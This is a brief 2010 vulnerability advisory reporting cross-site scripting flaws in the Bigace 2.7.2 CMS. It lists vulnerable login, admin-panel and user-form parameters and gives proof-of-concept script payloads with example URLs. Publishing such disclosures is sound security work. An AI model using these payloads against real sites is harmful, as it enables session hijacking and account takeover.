Producent poinformowany.Kod:Name : Bigace 2.7.2 Vendor : http://www.bigace.de/ Bug : XSS Date : 18.06.2010 Tested : Ubuntu 10 LTS Thanks : 4 you Details : There is a XSS vulnerability in login page. http://localhost/cmz2/bigace2.7.2/public/index.php?cmd=application&id=-1_tauth_klogin_len to see it, type in login and password: "><script>alert(xsshere)</script> (its POST $UID and $PW value). If You use for example DataTamper You can set XSS for $language variable as well. So there is an option to XSS by $UID, $PW and $language. Its also possible to make XSS attack by search engine (DataTamper + $language = {xss}). In admin panel we can do xss via GET: http://localhost/cmz2/bigace2.7.2/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len&data[id]=1&adminCharset="><script>alert(1)</script>&data[langid]=en&mode=rap next: http://localhost/cmz2/bigace2.7.2/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len&data[id]="><script>alert(2)</script>&adminCharset=&data[langid]=en&mode=rap XSS found also with $desingName, $description. When setting new user, click to 'userdata'. Here you have 11 form field - all exploitable by XSS: $mode, $data_id/firstname/lastname/homepage/phone/mobile/fax/company/street/city/citycode/country. When creating new user $userName is vulnerable to XSS. When we get to logging page (admin panel): variables $start, $amount, $namespace and $level. Statistic page is the same... This tame $mode var is vulnerable. Thats (maybe) all. ;)